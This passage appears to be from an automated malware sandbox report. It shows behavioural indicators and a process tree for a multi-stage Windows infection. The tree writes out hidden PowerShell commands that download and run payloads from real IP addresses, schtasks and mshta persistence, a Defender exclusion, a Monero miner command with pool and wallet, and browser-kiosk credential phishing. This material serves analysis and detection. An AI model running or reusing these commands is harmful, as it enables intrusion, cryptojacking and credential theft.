| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107940101\1a8233e8ee.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\gmwu\wtrpqgw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1161330783-2912525651-1278508834-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\notepad.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\System32\notepad.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe
"C:\Users\Admin\AppData\Local\Temp\19994a71ea626e2a911e06e8f33c368d63e8308d1264473d7490d12e41631288.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn XeMacmaJDcd /tr "mshta C:\Users\Admin\AppData\Local\Temp\govWI9x73.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\govWI9x73.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn XeMacmaJDcd /tr "mshta C:\Users\Admin\AppData\Local\Temp\govWI9x73.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'QVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE
"C:\Users\Admin\AppData\Local\TempQVG2RF1Q9SJCYVVVCQPVS4PJ4TTX1EF4.EXE"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe
"C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_2184_133856913259024659\chromium.exe
C:\Users\Admin\AppData\Local\Temp\10102370101\SvhQA35.exe
C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
"C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"
C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe
"C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C251.tmp\C252.tmp\C253.bat C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\Admin\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\Admin\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe
"C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe"
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe
"C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe"
C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe
"C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe"
C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe
"C:\Users\Admin\AppData\Local\Temp\10107440101\99878a5969.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /tn cS853maNMMf /tr "mshta C:\Users\Admin\AppData\Local\Temp\B5JKcUmDB.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta C:\Users\Admin\AppData\Local\Temp\B5JKcUmDB.hta
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn cS853maNMMf /tr "mshta C:\Users\Admin\AppData\Local\Temp\B5JKcUmDB.hta" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10107450121\am_no.cmd" "
C:\Windows\SysWOW64\timeout.exe
timeout /t 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\installer.ps1"
C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE
"C:\Users\Admin\AppData\Local\TempXDNDI8ZRONMOZUUJJYOH5TIGQOSC6H29.EXE"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zgq0aj3o\zgq0aj3o.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES119A.tmp" "c:\Users\Admin\AppData\Local\Temp\zgq0aj3o\CSCF0F5354ECBDC4CB8ABF25013C7A2A43.TMP"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "TYIbymaKsFJ" /tr "mshta \"C:\Temp\Y3xqvQ15g.hta\"" /sc minute /mo 25 /ru "Admin" /f
C:\Windows\SysWOW64\mshta.exe
mshta "C:\Temp\Y3xqvQ15g.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\ProgramData\gmwu\wtrpqgw.exe
C:\ProgramData\gmwu\wtrpqgw.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe
"C:\Users\Admin\AppData\Local\Temp\10107870101\2b7df62c2f.exe"
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\xLUFfgfR\Anubis.exe""
C:\Windows\System32\notepad.exe
--donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40
C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe
"C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe"
C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe
"C:\Users\Admin\AppData\Local\Temp\10107880101\5106e5bbdb.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3836 -ip 3836
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3836 -s 812
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe
"C:\Users\Admin\AppData\Local\Temp\10107890101\feda7c9ffa.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 4384"
C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe
"C:\Users\Admin\AppData\Local\Temp\10107900101\03eec02af1.exe"
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe
"C:\Users\Admin\AppData\Local\Temp\10107910101\4abf414f45.exe"
C:\Windows\system32\tasklist.exe
tasklist /FI "PID eq 4384"
C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe
"C:\Users\Admin\AppData\Local\Temp\10107920101\035c4d64c6.exe"
C:\Users\Admin\AppData\Local\Temp\D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe
"C:\Users\Admin\AppData\Local\Temp\D9XKKB9O9N2PRS1XRFCPM2T26NLITF.exe"
C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe
"C:\Users\Admin\AppData\Local\Temp\10107930101\a6f3c10671.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM firefox.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM chrome.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM msedge.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM opera.exe /T
C:\Windows\SysWOW64\taskkill.exe
taskkill /F /IM brave.exe /T
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1988 -parentBuildID 20240401114208 -prefsHandle 1904 -prefMapHandle 1896 -prefsLen 27490 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e4da8b1-1917-48f8-8471-c9d4026ec0ea} 3168 "\\.\pipe\gecko-crash-server-pipe.3168" gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2472 -parentBuildID 20240401114208 -prefsHandle 2448 -prefMapHandle 2444 -prefsLen 28410 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {24a83a43-be66-4ac1-b59d-ee0f9412b728} 3168 "\\.\pipe\gecko-crash-server-pipe.3168" socket
C:\Program Files\Mozilla Firefox\firefox.exe
